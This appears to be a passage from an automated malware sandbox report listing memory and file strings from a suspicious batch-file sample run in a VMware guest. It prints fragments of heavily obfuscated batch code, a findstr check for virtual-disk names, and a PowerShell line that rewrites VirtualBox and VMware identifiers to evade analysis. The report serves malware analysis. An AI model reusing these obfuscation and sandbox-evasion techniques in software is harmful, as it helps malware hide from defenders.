Source: svchost.exe, 0000002D.00000000.2187357921.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,@
Source: svchost.exe, 0000001A.00000003.2167646150.000001D559CEF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -47vmci
Source: svchost.exe, 0000002D.00000000.2187569565.000002644A702000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 0000001C.00000002.2348049601.00000253A6312000.00000004.00000001.00020000.00000000.sdmp, x.bat, $rbx-CO2.bat.12.drBinary or memory string: !rVidQItrFEziRllqOEaqQHUmIIPzKZoYnynQlNssJFTISHfwGiiuZcyJbVuhTTGFpAVsXuealIHl! "j%vMvunfawAVJCQfglpONJIGztkGEjrNACzGAcHFHgfhOZWHZeXPuTSsWOmbkGAQeMuhd%i%kFdDKhHEBSAxDGzmCtHJgKMQGubFocbFPDPzUmJMlOvVMDHZaECtNxXASnWpfbpyRVI%B%ZRarpJUxroRedNbFJAIRrFpGHquGkzWdQVHiamnJSaFlbiTCevFYjdrtBtKZponSsNn%l%ifTFwmYZqZeEyxRCOTYUNDnGHCouEMNSoVKwkQjLkdatwOlCxMzZtSAESmYUYEvEmlq%V%DMvrXJmJJDTjSqLWRnOyvugEXSoMGIwhlxIQcuBphjQbYdfEmHDqyNViFRuevzdbgMY%O%uHVUxLyrmEeFUNKAZffJxCzkkaxTHfPVleKWqMfEZvIEAlzrLZeVadARiLKxoFKgPjt%d%PcOjmZBKcTVJZAfiHbTUiDSNFcIquLCPrRJpXQRWzsyXmbKWjwcfVplmjaDkqkprrgs%Z%hQPlQjWvPfUBDrMgXJwTbGxgXnHGochGgJDgtklVYUvhoyaSEdsHUnqBsJoDBqgMXov%V%UOFMNxAUhlqSynPblKzLTsbNKWHuINIjZdgeYqEkusiqcQQqMoVcyDBBMSbRQgmtChS%l%ugKdUfprAkLKUfqHtSGKvCEsfoNunfPNVYvjckaWjmarahhLzySAWxwSBsXFrUdvuXP%f%WKgFiRJAjBnrXgcUPnoQyBDHJnvEoiFWcslasSJJnWnroaaypZoighruhzWVwflaVro%D%FVcCWDFDBoltJnWppUxPVaRTTWOmhKmvWMuDmxrEBDPgVfnIzPWgyCtEdiJaPsvRcQx%o%XStcSCSoskKXOJfMrNfXusPzdNrPihYefHpQgNeEFoautlVrJGddWSdEcTYekdfkmGS%U%gtpFEJAsfsvgSSagCdVhnDLNnOatCiQiMsOXuazuvAXmGNglkWCgqyFCHBsQJhQXBnt%F%zecLCEBMNGzgzHOiFGJRoNlqSHIKoJaKttGhikaCPMSWhvSiUYlrRwfMSMTUWQxdFPN%k%gbHauFhbBVpixPzQpyJSWnUpvrgFZoOqsHMhnXQLKvEQCDwfwZiEWWQSgrEczBbmgYQ%Q%PcsCrHXiBJdMSVajagkuvQTaVsOmitrJEMGcewQWYNpicFMhysbgWDuZjrHYTLahsui%k%fpYeDpnwHAKXqGGOPskNarGTMPRcmNiQIxGSAoxQIhNyyuqsnXlPhGiOIerNxlkUsUp%e%TZOnAUueSEhvszzPpBtJboSjvWKtxXSgEfxszJKUNBpjAJZoYwVsZlnEhESEkbHVMbR%b%nbhqFRyVAZJJLWvubbAgsSSkUQgKMUtxySLmQfpABpNEyVgHOGGTlVyviWvOLOjFGmk%K%TljDVMZFdeoMYKyWfozlDuqeUKAPMfhYmLnwFcKhmquqUjwemSdrgaHzUfJkljSYXpA%I%nwbrdDsYmZZjLnvCUbPSleOBztzVcxwsFIiIkBaOOcuzUVXXPGXWhwpjIARKdwVPCHE%G%ceNrtabeiJoHEvCfwAzlitZaKJqLrgFXnrVScpEVgsgztSmpArzocvvJfNGJKqMcert%c%mzKdgWEePmzGSxakaGqURWlMoIUkQGeubzaPQnssyrFxGhOmKfMvOxBqnXPybtojheE%=$%wluMoXvAqOghTHAKTJFEXJBSyUredvpCCvPyKZhRbbZzRHEtTDqyyavNJCnt%a%FqxUzDFxSbaTBODVJcaQpXlzfRdCacPiLNlKEfZncgBRDwWKxzdHBweIfXOI%Z%AdxPmRhOCSrEcNOiwuWJUteAZiHpJDFHqrNZJLELoihEiyENIVlKafNhYXQe%k%jSeYmJnLZOzKPluMlzrADTGOrUGlDGbMVACvdirzlTOTwAVPKbVyFpApmqHs% %cchtNMPoIYJciSpKfMrQZRBCKCgFamjMBZwjMugJLGgLsTqNZPkzYQslAEIk%=%GjnwPWAiwgYLGIftLPkRmtGlcKNLHlIhLVdBsJWvsirSRySqKYzKuRYmDcuf% %jPAkyQZLFEabTOzecNtDRxbILXNUWRXppQmCHguazhLfXyRGrUjQIRoLOSzA%m%deOOHLMcBWxWstdJLVKmghCcHgGxCAOOGTXusXymMOevxnypNEaShmuWCMgA%F%eozaiIpzwJqOwxAschFtIrKYAVHuzaSGQYhxodnOYYSenlwJLcTugNRNEBAm%H%bUavQKXypddZUQvJyGLozXIwhyzdguTMDaNdYxnCoXtIYUzqrhpXQlMdmDos%o%lUrVjrvUcsLatiaCDaynYiLZfVWsnJQvjUrtFyyHyFnZwoEIkkAmeaucisQo%z%udGtBpRyQHWeBROsVMCQrohcjEriAplnIkmvZUyhwgRDovKnmbgwPZXgVDkW% %YJYBwIwrEttbovukwDONUdVyiOyInfzwKBiMiqhGZtITIfitEMKsPxcUNztH%(%jNdzTWrMmHcgvhNAvcPcGedBvhHmzoZIXAwlpjZLOvgXJDWHJByLKqaeJCdM%"
Source: lsass.exe, 0000000A.00000002.2300143860.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 0000002D.00000000.2187357921.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.26.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: dwm.exe, 0000000E.00000002.2338111026.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: Microsoft-Windows-Partition%4Diagnostic.evtx.26.drBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.26.drBinary or memory string: storahciNECVMWarVMware SATA CD00
Source: powershell.exe, 0000001C.00000002.2348049601.00000253A6312000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %lmylYBQYXmFgWLhImq%s%HlSRCKqmmyyypSJVZBbNIFUhYLPlxNFhdstWsuVBHpEAzNqn%%QihlDbcqLSRUfOzSrvWzMCE%e%zfsbuIlvBYHFyVzrrGHBdHCAeHhstOAnDBMyIbVcHwth%%UuwVFhgVcCSCRWNBT%t%MxtbXibIqKF%%HovtkmLwOHtsBYUVQeiBOuGJNTwnTXRwqiVDhyMAQwnfdbAYogRlBefmIL%l%rPyCQQXcsdqNssHLsgAFLsyYNgFUmcIVvSuLrUwpgZh%%XsyTUsNghfUYrzOKkcPpvurAXWtxKkzLlCbuHLZTpCNpXwtSfMedjRACaYVY%o%pwXGiNPxudycWaTGbCBCAsXfvBtcyuIQbTZfQJOJEuLIFanQHVYvuvzXyRkHtMZZ%%IbdaNQsNRYfHpzuoCvCvnvFtcHYyhpR%c%LoXZjQTfGHCwtqisQsRrwEhnvJYfRUGC%%KVbCvfMBxPFSjaMyG%a%PxzYghJDASOnMbapJuhPunePZPBumJlGllQeHMOUSSFUNj%%DSTqsrQoBtJYr%l%oqQGhcAkVHXFnWBIkcQLYCssTpvXoLYNwoEBOnFhDsX%%tMeTMTiHiGHMXxNSHCVjJji% %saTWwJiFEgZglBlvDqFQHSDqANzawNDjDfBMZlkzxbhRyGHfrAGsEsqAwCwIjii%%DQCfayvrfgtGKMSTguIWhkFlPaqwPBpoTqnHdBfSeomyYKPJJCCPAmJ%e%krqZiYCDQeMuzkPEoPRTXgmelGMnZA%%HGUwMlgKgMIHUXukzMYAKuQveelNBloEqqfNEOdsifLgozshRwnA%n%ZdmQzsIasi%%xerDRGFLJGsFJJgELeWfXODqmTXfvusPWQIkiOpkRCRuHxCgtOXVvdWJAbr%a%JAponCITbVwWOMnuWjIOqQMGxwtTTYKgxrBrmCgePJfxrahJPBNqsCHTOJRRjOZ%%kpyxkWhtcEZH%b%oowpJesltOVJIDDLpVaKdmcCJzSttoNCaizuvCzKHQRBDOCt%%INIZXGbmTFkmYSfasJzdjqNwpdnvAYVWyPKBfDdCx%l%BWoyIXMAledqusZmJT%%GLVKoNihDVOGXFbORiRupJaNQTiusB%e%UjiRvGlZKAQiFwygKtDieSzeWLhUvEOObdUwONFiFigUyAvrrNybPtObJ%%UKyqEgMbgBCcrW%d%uCWLEFwqQDIgMZIpSMKSVJoDaixuTOpvBnuQRqezytINWZZbxmJp%%dSLnsLwhbxbnmFzFSxBHkuBaBHaivWGfaOxvJCyFIrwWH%e%JtAwFPhHwJqKMLKnMfRVnyidWqYWZSXFtbXHI%%qQXsrNeYPMVuFrfLmllwApQlHDMLqLOcENOaYUgvZXAlaEnGzHPMvmybZMLOasH%l%YSPRCeNrfQwDOE%%cpgmJVcHspNaljsuHpvn%a%PweuUxHFQVmuCIyUgY%%WlxCOeChMwPntrbnTcR%y%yvcCuBFIBTzAqnqXrTpqspUjaHTdAuESpjKBiVhnyTGTWoWgaeWaM%%wiBTBMHCihpHlhCPOwLbSyJbnMKNcwyEfPMBa%e%tvFVLyDodPDlpzoKHYzzGPbUAL%%LBvubPzcqwXNkxYJVkQhYpviOcAJEtLuZPRMHvBwQwXoJko%d%HggKJEKvgnFZ%%PyXKCOuFlbzIuqBsgyDNybymb%e%vfwGtPChaYaDgwUwveHbpnidaPcmQOZKJStojFIKfnqDrCrh%%bFuFZvhXsFDNqqmZpUodFmQwWWbXFLxyUtPiFfKxlrRZeXPXeDcIcdnPP%x%IctjrGifSXBdtjjRRnuQsZgeTbJPvQgZtHxHdcZkRYeSwbkSylmZuYFIWoqqWt%%bQBJMMBNPnjYtVoISRRqkEgFubOLOLJoyocbUrxfXxwLkamN%p%GyzfczxKWpKYQYdEVAfSmNAtLtNiuuuPadinkjvOFrYbN%%gyshozgVvSXftJMopB%a%UXMQQuMfqmVPzGEmoPnfUIfIpqeQLcqcwhSkuIBNCuQIzdyzPxxybwZlSdA%%qVtoVTsrNuRGoACASwjmREbnESaahHrqhbxGa%n%MGKgMvGRkBTztvUoILUgKdSskgcAymdWzqJCBLS%%HMHyhHoWwTsLLURJOsVFsfsYyXZcMsMWSoyXwtkDSge%s%TrkEyaOiQnnBuIajHlkegwTxwUmuhsNmbNehNuELEE%%FbWCNtaVGWayxxMi%i%NtayzaAGETwmHyzCqovzrzbgwhqapHJamaYkDHgav%%jzEIYxAWhjqJlosTbsJzrXkwaHApYIhvdvqBCOiTAtAzJCOJSKGOqWEmphHr%o%lXzbVFPXQqnjQZYwLNySQwobtehRemugQVpvbxNWYMbttEzWFPEujyhOJxIRyY%%EWgsVKDvnZBUevUIPEklpIaXrOALDPWyaSxxnlEmctqvIEdtOOSmnMEVVi%n%gjRSyccTlXx%
Source: lsass.exe, 0000000A.00000000.1990332991.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2293458545.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000000.1995151583.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2282909657.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2277019889.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.2067918810.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.2070050099.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2275201092.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.2086864501.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2302804582.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.2100413094.000001D55862B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: lsass.exe, 0000000A.00000002.2300143860.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
Source: cmd.exe, 0000000F.00000003.2087717919.000002512A76D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IrJixRQdwUjyuCVcSzIEUPYkcecxbDY%O%eDjNKJQaGgpBwHubMFLVJXAlTtzgsPtbSWeUkPltbycxEoCCIdq%e%RpIohcYTrkKHRNnJADzQWurTkVdGFQWyozCLjHXRmVUjrRlKqEb%i%ZintwXOdmZroAnmsrlBzTFHDbAiCtKspaOXpbgfOvDLSUHtVfyT%t%zOfitBKrWPmKCHboLqXrlfNdpUPIugnxVQSBUGENqOiYiTikTsH%v%FhgItabTyMbXPCOOLOAtfMjawXPUvLEPbzHpPhzASMfbpQswtex%v%wsZCTYfmwlgxMimWqUzZDpaAsGiLFEsAqoiwbWOrJVcoLptSdUc%Y%CUfTgsyjmPuGRTFgyZPUufiqHmMOdnpILCQGlubeDMBBpplvgiU%U%TnZHwMPmUFJgZAMVpcZVdYKrHEGasbqIUswuLUtUwigyTGBbDuV%R%sgnRUCIaSfOTTpamHdrjuIfyVSmxbcExYfYCGACRdTBOHonjStU%=t%lkBJbOWbqkZPAqVNqyFgAAfAhqQGEcFHiGmNDoAREAATUMnrtzStONxKeaCKYpxnEsHUehjbYNCaZm%e%GudznfjlSvjBIDMPTodmoBftmlpRvakwLSuhHycsetzlKCzGpjTnWMXepJmbPsQSkMQQiEhvmLiVcT%m%IKMJBmhXzYUpRYlaCLCHbYMIxLbxblDcbwaCpgREKmmRVTMjjlixtvSKXdlQkJWovSnvXJKwUYWOLU%.%NEYSoPdgIGEqEmUatbqYwdFrmAALCvydYdqGRsvhlojHRGfyBTEVyNyJZHFNorEniAsBWojaGjNiTX%I%zFvckJQDElEGGkMHSTKVzqoDBnKDppaqPbhasmhUxFWhWqHYnYqTxYyjqRBWYmnpkoQFdMoFMPyUuh%O%HlGLpqYhSRDXJBLkVkrGWIzcVBKLgIAEPjkpqnWXqdvYbfcNUCTnCNlYLEQOFnakrYiAqvUIntqSnB%.%aPzXRDOmbbYlEMwirdckGdWCwyIkZjxsLkDaoIwwwfXhBeRhmecmPcUXSWAsVDnSEFAuivTIHFOBfP%F%arHAYUgkCIpGhsidBTSfDWEwYQltFjosRdWjLuEsLtcSeCnBADeVJameNkBiJMEstXOevYsgoztjTL%i%swCJTbftIRRSvASwIYOJyhNjgBlXGkHckbSfFaTDnaoXmDCRoSQuujnkItDrQhMyjPHuINRIflwyTQ%l%WCYtJOtmHbOHwlxBNfnPNxWijAaiojMOrSwatwyYfWhFGaqFlEyqldcyGQkiNlYyoZpEOwiqHoJQqq%e%BikvWKKwDnPYtCmpkUYIqHLLQOvhIWtmipobXsonNSvbPQcFesdPRHZUxzEipCOGUCPeokrSFKVylJ%]%WaLPdqSEuAqtEyNgYkeOhmbYrTalkhMBJNDDwzzxOpioNVGTeyMKuwBJZMyjpHtnOPJQVkJzLGaRdM%:%kwmggLubgnlTEJaphhWVzYlQYUOnZOvKFmBcWjAISNIwEbFZyvyTVimmlwimWhbsRBnriYsYGocMqO%:%mWoOOEpCOwapQAanLKLqFcNnRzdAmHgzVwjmXhtxdoNRqShRYtCrbZjkjaXpAPqhqAtuqOqDrnnqpW%"
Source: svchost.exe, 0000002D.00000000.2187357921.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: cmd.exe, 0000000F.00000003.2042220661.000002512A740000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2041976604.000002512A740000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" ##?
Source: x.bat, $rbx-CO2.bat.12.drBinary or memory string: %lmylYBQYXmFgWLhImq%s%HlSRCKqmmyyypSJVZBbNIFUhYLPlxNFhdstWsuVBHpEAzNqn%%QihlDbcqLSRUfOzSrvWzMCE%e%zfsbuIlvBYHFyVzrrGHBdHCAeHhstOAnDBMyIbVcHwth%%UuwVFhgVcCSCRWNBT%t%MxtbXibIqKF%%HovtkmLwOHtsBYUVQeiBOuGJNTwnTXRwqiVDhyMAQwnfdbAYogRlBefmIL%l%rPyCQQXcsdqNssHLsgAFLsyYNgFUmcIVvSuLrUwpgZh%%XsyTUsNghfUYrzOKkcPpvurAXWtxKkzLlCbuHLZTpCNpXwtSfMedjRACaYVY%o%pwXGiNPxudycWaTGbCBCAsXfvBtcyuIQbTZfQJOJEuLIFanQHVYvuvzXyRkHtMZZ%%IbdaNQsNRYfHpzuoCvCvnvFtcHYyhpR%c%LoXZjQTfGHCwtqisQsRrwEhnvJYfRUGC%%KVbCvfMBxPFSjaMyG%a%PxzYghJDASOnMbapJuhPunePZPBumJlGllQeHMOUSSFUNj%%DSTqsrQoBtJYr%l%oqQGhcAkVHXFnWBIkcQLYCssTpvXoLYNwoEBOnFhDsX%%tMeTMTiHiGHMXxNSHCVjJji% %saTWwJiFEgZglBlvDqFQHSDqANzawNDjDfBMZlkzxbhRyGHfrAGsEsqAwCwIjii%%DQCfayvrfgtGKMSTguIWhkFlPaqwPBpoTqnHdBfSeomyYKPJJCCPAmJ%e%krqZiYCDQeMuzkPEoPRTXgmelGMnZA%%HGUwMlgKgMIHUXukzMYAKuQveelNBloEqqfNEOdsifLgozshRwnA%n%ZdmQzsIasi%%xerDRGFLJGsFJJgELeWfXODqmTXfvusPWQIkiOpkRCRuHxCgtOXVvdWJAbr%a%JAponCITbVwWOMnuWjIOqQMGxwtTTYKgxrBrmCgePJfxrahJPBNqsCHTOJRRjOZ%%kpyxkWhtcEZH%b%oowpJesltOVJIDDLpVaKdmcCJzSttoNCaizuvCzKHQRBDOCt%%INIZXGbmTFkmYSfasJzdjqNwpdnvAYVWyPKBfDdCx%l%BWoyIXMAledqusZmJT%%GLVKoNihDVOGXFbORiRupJaNQTiusB%e%UjiRvGlZKAQiFwygKtDieSzeWLhUvEOObdUwONFiFigUyAvrrNybPtObJ%%UKyqEgMbgBCcrW%d%uCWLEFwqQDIgMZIpSMKSVJoDaixuTOpvBnuQRqezytINWZZbxmJp%%dSLnsLwhbxbnmFzFSxBHkuBaBHaivWGfaOxvJCyFIrwWH%e%JtAwFPhHwJqKMLKnMfRVnyidWqYWZSXFtbXHI%%qQXsrNeYPMVuFrfLmllwApQlHDMLqLOcENOaYUgvZXAlaEnGzHPMvmybZMLOasH%l%YSPRCeNrfQwDOE%%cpgmJVcHspNaljsuHpvn%a%PweuUxHFQVmuCIyUgY%%WlxCOeChMwPntrbnTcR%y%yvcCuBFIBTzAqnqXrTpqspUjaHTdAuESpjKBiVhnyTGTWoWgaeWaM%%wiBTBMHCihpHlhCPOwLbSyJbnMKNcwyEfPMBa%e%tvFVLyDodPDlpzoKHYzzGPbUAL%%LBvubPzcqwXNkxYJVkQhYpviOcAJEtLuZPRMHvBwQwXoJko%d%HggKJEKvgnFZ%%PyXKCOuFlbzIuqBsgyDNybymb%e%vfwGtPChaYaDgwUwveHbpnidaPcmQOZKJStojFIKfnqDrCrh%%bFuFZvhXsFDNqqmZpUodFmQwWWbXFLxyUtPiFfKxlrRZeXPXeDcIcdnPP%x%IctjrGifSXBdtjjRRnuQsZgeTbJPvQgZtHxHdcZkRYeSwbkSylmZuYFIWoqqWt%%bQBJMMBNPnjYtVoISRRqkEgFubOLOLJoyocbUrxfXxwLkamN%p%GyzfczxKWpKYQYdEVAfSmNAtLtNiuuuPadinkjvOFrYbN%%gyshozgVvSXftJMopB%a%UXMQQuMfqmVPzGEmoPnfUIfIpqeQLcqcwhSkuIBNCuQIzdyzPxxybwZlSdA%%qVtoVTsrNuRGoACASwjmREbnESaahHrqhbxGa%n%MGKgMvGRkBTztvUoILUgKdSskgcAymdWzqJCBLS%%HMHyhHoWwTsLLURJOsVFsfsYyXZcMsMWSoyXwtkDSge%s%TrkEyaOiQnnBuIajHlkegwTxwUmuhsNmbNehNuELEE%%FbWCNtaVGWayxxMi%i%NtayzaAGETwmHyzCqovzrzbgwhqapHJamaYkDHgav%%jzEIYxAWhjqJlosTbsJzrXkwaHApYIhvdvqBCOiTAtAzJCOJSKGOqWEmphHr%o%lXzbVFPXQqnjQZYwLNySQwobtehRemugQVpvbxNWYMbttEzWFPEujyhOJxIRyY%%EWgsVKDvnZBUevUIPEklpIaXrOALDPWyaSxxnlEmctqvIEdtOOSmnMEVVi%n%gjRSyccTlXx%
Source: $rbx-CO2.bat.12.drBinary or memory string: !BYarQcOfuEgOwbePEByPiELbMcxcMCvfLACRyOEQXJGNbtMghEzExriXnYFNELtRibdWznrQWISyXYas! "C%vDkunAhkxtpfXsVEAEezopSuOnXnLnLYrMDzYSWQxyPXnjpeZdCZgpAfLQGZCTzkHrOlOwGHHo%Z%cQAUgEYSoHKLSclxOhmXnDYEpVvepCxUrRnJFQJbbKERzVzLZrIyvKaySVEljUCLkQuaOBSXyk%d%VDYhfuvJeYUZzHQORJlyShhSHJBzWxyKakOxzKQkPzPERlqMjaKjLasOvgAwTWMGzjZoStphSb%j%IsrCbwsOpWNpZZRZctkurSMieHlcUQKCqKraxSeedeHPTkkZwSrVXyKPFiyukqTymkYpHRCjof%m%qmlXpUwmFbzPFRZCvouKUNkiDImVrFqhGRixEITEXXKSZwFgpfwnOElCbctHHBVaLriOJCYMvQ%j%MWdsjgdfFlicscFGwBplWwcJhHoQxNhJSYSpyJSmDCVJRIZgjdfwxjTpUtkCSmISezkujqhNIc%q%IuBtSzHiHtHKlIeCveyqurTcEsxFWTVsNvBzOBBLUJFoktnBpHUcosIqAyOAbcmOyoWQhENTDM%E%vLMFRleWpoYTdvMkZpNbKSwQQVwwuKTbyCXXEVGCvfMXQElBeWFygCbDoVOVOHBFvXuByPGeIk%J%FFfyalKVsyfvUWAtIIgLNODhCTkJdopBPWWwxPVDlTocAZdxaegXYXwRbYWhbaRdiEFXaeWTNC%m%AUzAGCQMJYirCRAfuzTNBkbkUWufxWhnkvxCsBrtrorTVQbOxVJxZZaqSoGKiKpMQUhhuYMThA%q%wmSipdVGICmKnkuhJeUGkGZFcbJTtziQpzCOxJZDPCcMAgGXMmoIYApQnngotbmjuwvOHGJZfq%D%RIEneVuMhgkzROkMAkDLjOqTseLSpgDoDIJGlZikTHTfYVEGDUfzwtgdsLUakBwbDWVjfDBBbs%p%RCUkUxzeouadRjBGoAfhZskSBcZuAatEyeCEihQxAgmcaAeLIzpawTsysbJSxeDobwFNHXxhJH%n%GTfiSbXoMbLsiELdmgxXavCYaEVqeLbhqOmytjjIUisCDInacDKqJLHkrhhofHkbaDctrmKcXP%w%dRdausqUoAaKyEhbhmcVCnYqCZGUJPTItTIPhrMOXlsJbpfxmpfxZbnPTMyvMwlyHrrEWrUPAn%U%XrUopmUjHtKvJrGTWuTrcBaUcJYAAUupXLdWUFwlADOROlIZXdvAWjlwqalFouIMZuyXoKYqXI%I%QzMjgQbZCxzUtOAHFUtRWgUcRtNKLneeCnsLKhUuEpRkneaKxGfeXgLKEKrMdrnptusfvOXxZY%d%mHoKPNsdneiagvCHhaQhrmbCQSMVoIJHeYTdvUUDuadjgtnWDOHWHSHZFMTWbxPFuAVhCymnfm%E%NrjSvxEPrAbMamrTxIaYCXkyOGxgueBuRuepQNrwslfoDHAJQIaDmhJQgKdOayvnYHVFhcdKrE%k%FrRWUgfOpLdYhKLoifKCvUPSqWMUBNFqmIBsYkQWIliJjazkUTTXZOiLBZFXtlmCgNLyjspYpN%O%UkLgIqxCaITHqyAPQZESCxZFCvobbBDVIlUYZvqpARkEIzwnYtBqtwlwkfDmcvAyfYZeECQvIp%=*%KmvXdZacIamBlaxNTRdneqMzJAsJwCfHefAjPiAnbsSySxNdgOWEEbmtAWnD%s%GqGfUFwgAoXLrPlLyoGlMoDHGBccSgJTUWGKMNEnbGDSQlmPQAVmpcQsNZzs%*%CtouEeQuiAZLJtkfLKQupnmrkwESfoWNolKHsinMvRGpBkCVRLHdiedohXjh%t%zXpUDmxyICMCwdZxHWPaUJauGTEjiwAvZfnxCLLoMempYfGefGHkhinQWUnJ%*%InpmbrDqQBUVlBnPwLwBnzeCPqoQSwAHybGzOZnHCpoDLLZFUxtlyMwijNxL%e%cMytamxjUOawyPZYlAQdrIVudpjLFypbCCEPQUCyoQLfwWNJMyWIWutuRdqL%*%dLDvzZUVkjhqXsOBWPYgBzYgBGfiijYNEQvDmpGxcRyDrFKEFRxbfkkDMwUS%m%TLMbltMhWlpHjAdJbvPVVACrMWIuGRRPvNDrfxrXTDHuCQSEgACqGYWtivoo%*%LsAetzlvXMEDeScsTiOWedngpAixRkiJiclAdCadExHuVYmOVEzaHskIftPT%.%qNEMEVubGCoqiLrHwTlrouCmKicQSDvKNhNRSUPZDkitpiRWaCmlhxEWlrbw%*%SEicgEDaXAOBdlOdljWCqgPprjCpCQFBSthYcgmLEQYAOKiVJALcuzfMOSLW%I%bnygUmIJePbeWlXzipBGbGGcfDhtnukjvpJrsRFBcyRTyGfiBGEyreVvGwbr%*%fpwJESJGBGgqKaECPNDzxYRGQMSquoKWQovMcipGWzHVAnOqzsFTTBThxPSS%O%atmnVkAvERAHxWDYrVgDXBQbIRdpunpnpwGDmtapMsMHSYvWXVQBIoUzClEe%"
Source: lsass.exe, 0000000A.00000000.1990610706.00000202C0351000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
Source: svchost.exe, 0000001A.00000000.2100879086.000001D558DE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.26.drBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 0000002D.00000000.2187357921.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001A.00000002.2302118940.000001D558643000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmcitpA
Source: svchost.exe, 0000000B.00000000.1995514568.000002A66066C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000023.00000000.2146564984.0000023FD3802000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 0000000A.00000002.2300143860.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
Source: cmd.exe, 0000000F.00000003.2061101225.000002512A76B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QxAgmcaAeLIzpawTsysbJSxeDobwFNHXxhJH%n%GTfiSbXoMbLsiELdmgxXavCYaEVqeLbhqOmytjjIUisCDInacDKqJLHkrhhofHkbaDctrmKcXP%w%dRdausqUoAaKyEhbhmcVCnYqCZGUJPTItTIPhrMOXlsJbpfxmpfxZbnPTMyvMwlyHrrEWrUPAn%U%XrUopmUjHtKvJrGTWuTrcBaUcJYAAUupXLdWUFwlADOROlIZXdvAWjlwqalFouIMZuyXoKYqXI%I%QzMjgQbZCxzUtOAHFUtRWgUcRtNKLneeCnsLKhUuEpRkneaKxGfeXgLKEKrMdrnptusfvOXxZY%d%mHoKPNsdneiagvCHhaQhrmbCQSMVoIJHeYTdvUUDuadjgtnWDOHWHSHZFMTWbxPFuAVhCymnfm%E%NrjSvxEPrAbMamrTxIaYCXkyOGxgueBuRuepQNrwslfoDHAJQIaDmhJQgKdOayvnYHVFhcdKrE%k%FrRWUgfOpLdYhKLoifKCvUPSqWMUBNFqmIBsYkQWIliJjazkUTTXZOiLBZFXtlmCgNLyjspYpN%O%UkLgIqxCaITHqyAPQZESCxZFCvobbBDVIlUYZvqpARkEIzwnYtBqtwlwkfDmcvAyfYZeECQvIp%=*%Km